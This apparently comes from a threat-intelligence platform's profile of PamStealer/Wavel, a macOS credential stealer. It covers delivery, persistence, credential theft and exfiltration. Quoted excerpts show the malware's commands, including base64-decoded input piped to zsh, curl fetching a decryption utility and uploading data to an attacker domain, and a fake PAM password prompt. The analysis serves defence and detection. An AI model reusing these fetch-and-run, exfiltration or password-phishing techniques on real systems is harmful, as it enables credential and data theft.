PamStealer is a macOS information-stealer family first observed being distributed through fraudulent websites impersonating legitimate applications, including the Maccy clipboard manager and a purported cryptocurrency wallet. Infection relies on social engineering to induce users to execute a disguised compiled AppleScript, which launches a JavaScript for Automation-based downloader and installs a second-stage stealer masquerading as a macOS component. Early variants used a Rust-based payload and targeted Apple Silicon systems; a later variant, also called Wavel, used a Swift-based stealer and a server-mediated X25519 and AES-GCM decryption chain that requires live attacker infrastructure to recover the final payload.
PamStealer harvests browser credentials, cookies, cryptocurrency-wallet extension data, macOS Keychain material, clipboard contents, and host and user information. It presents convincing macOS authentication dialogs to capture the login password, validates submissions locally through the macOS PAM interface, and can repeatedly prompt until valid credentials are entered. Later variants access browser credential stores across numerous Chromium- and Firefox-derived browsers, use browser-specific helpers to access associated secrets, and collect shell and Git configuration and history data.
The malware exfiltrates staged and encrypted collected data to attacker-controlled infrastructure. It uses masquerading, native macOS APIs, host and regional checks, and encrypted or server-assisted payload delivery to hinder analysis. Persistence mechanisms observed across variants include macOS login items or LaunchAgents, repair routines, shell-configuration changes, and global Git hooks. Some variants also suppress user-facing notifications for newly registered background items and attempt to deceive users into granting Full Disk Access. No threat actor attribution is established by the available evidence.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
27 distinct techniques documented for this family, organized by ATT&CK tactic.
The compiled JXA format ... [contains] UTF-16BE encoded JXA source ... _app.doShellScript("printf '%s' ... | base64 -D | /bin/zsh -s")
LaunchAgent (com.apple.finder.agent). The primary persistence job masquerades as a system component and runs at login and every 15 seconds thereafter, restarting on crash.
LaunchAgent (com.apple.finder.agent). The primary persistence job masquerades as a system component and runs at login and every 15 seconds thereafter, restarting on crash.
Le fichier JXA contient une large chaîne base64 décodée ... Le payload ... est chiffré et récupéré sous les formats SNWK1 et SNP1.
The dropper then copies the bundle to the permanent install location, renaming it ... Finder.app ... The ad-hoc signature and install path masquerade as a system component.
Extrait une archive tar.gz contenant Wavel.app, renommée en Finder.app lors de l’installation.
The binary includes a full AppKit-based decoy user interface ... a 'macOS wants to make changes' authentication prompt and a password field ... The password entered is passed to _pam_verify_login.
Running processes [are enumerated] with ps -ax -o pid,comm 2>/dev/null | head -400.
User files collected include .zsh_history, .zshrc, .bash_history and .gitconfig, alongside the avatar image. ... The binary reads [the account picture] directly using dscl.
curl POSTs to /v1/loader/dek ... [and] uploads it with a single PUT request ... https://wavel.apple03cloudstore[.]com/v1/asset/${UPLOAD_ID}.
Before fetching the payload, the dropper downloads pkgunpack ... curl ... wavel.apple03cloudstore[.]com/pkgunpack -o /tmp/.pkgunpack-$$.
49 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Famille de stealers macOS activement développée, dont Wavel est la troisième variante connue. Elle vise notamment les identifiants, le trousseau macOS et les données stockées par les navigateurs.
A macOS information stealer delivered through a fake cryptocurrency-wallet site and a disk image containing a compiled AppleScript. Its JXA dropper invokes a zsh script that downloads the pkgunpack decryption utility, performs an X25519 key exchange with its C2 server, and decrypts the payload. The Swift-based stealer targets browser data, system passwords, Keychain items, and user files, and persists through LaunchAgents and Git hooks.
A macOS-focused information stealer delivered through fake application and cryptocurrency-wallet websites. It uses a JXA-to-zsh dropper and a server-mediated X25519 key exchange to decrypt its payload, making static payload recovery difficult without C2 cooperation. It establishes redundant persistence through LaunchAgents, repair scripts, zsh hooks, and Git hooks; steals system passwords using a fake crash dialog with PAM-based validation; extracts Keychain items and browser credentials; collects system metadata, user files, and profile photos; and exfiltrates staged data as ZIP archives.
A macOS information stealer delivered through a fake cryptocurrency-wallet installer. It uses a server-mediated decryption chain to obtain its payload, presents a fake macOS password prompt and damaged-app warning, validates captured passwords, collects Keychain data, login-keychain databases, credentials from 17 browsers, system details, shell history, and account-photo data, then archives and uploads the collected information. It establishes persistence through a LaunchAgent and includes repair mechanisms triggered by shell sessions and Git hooks.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.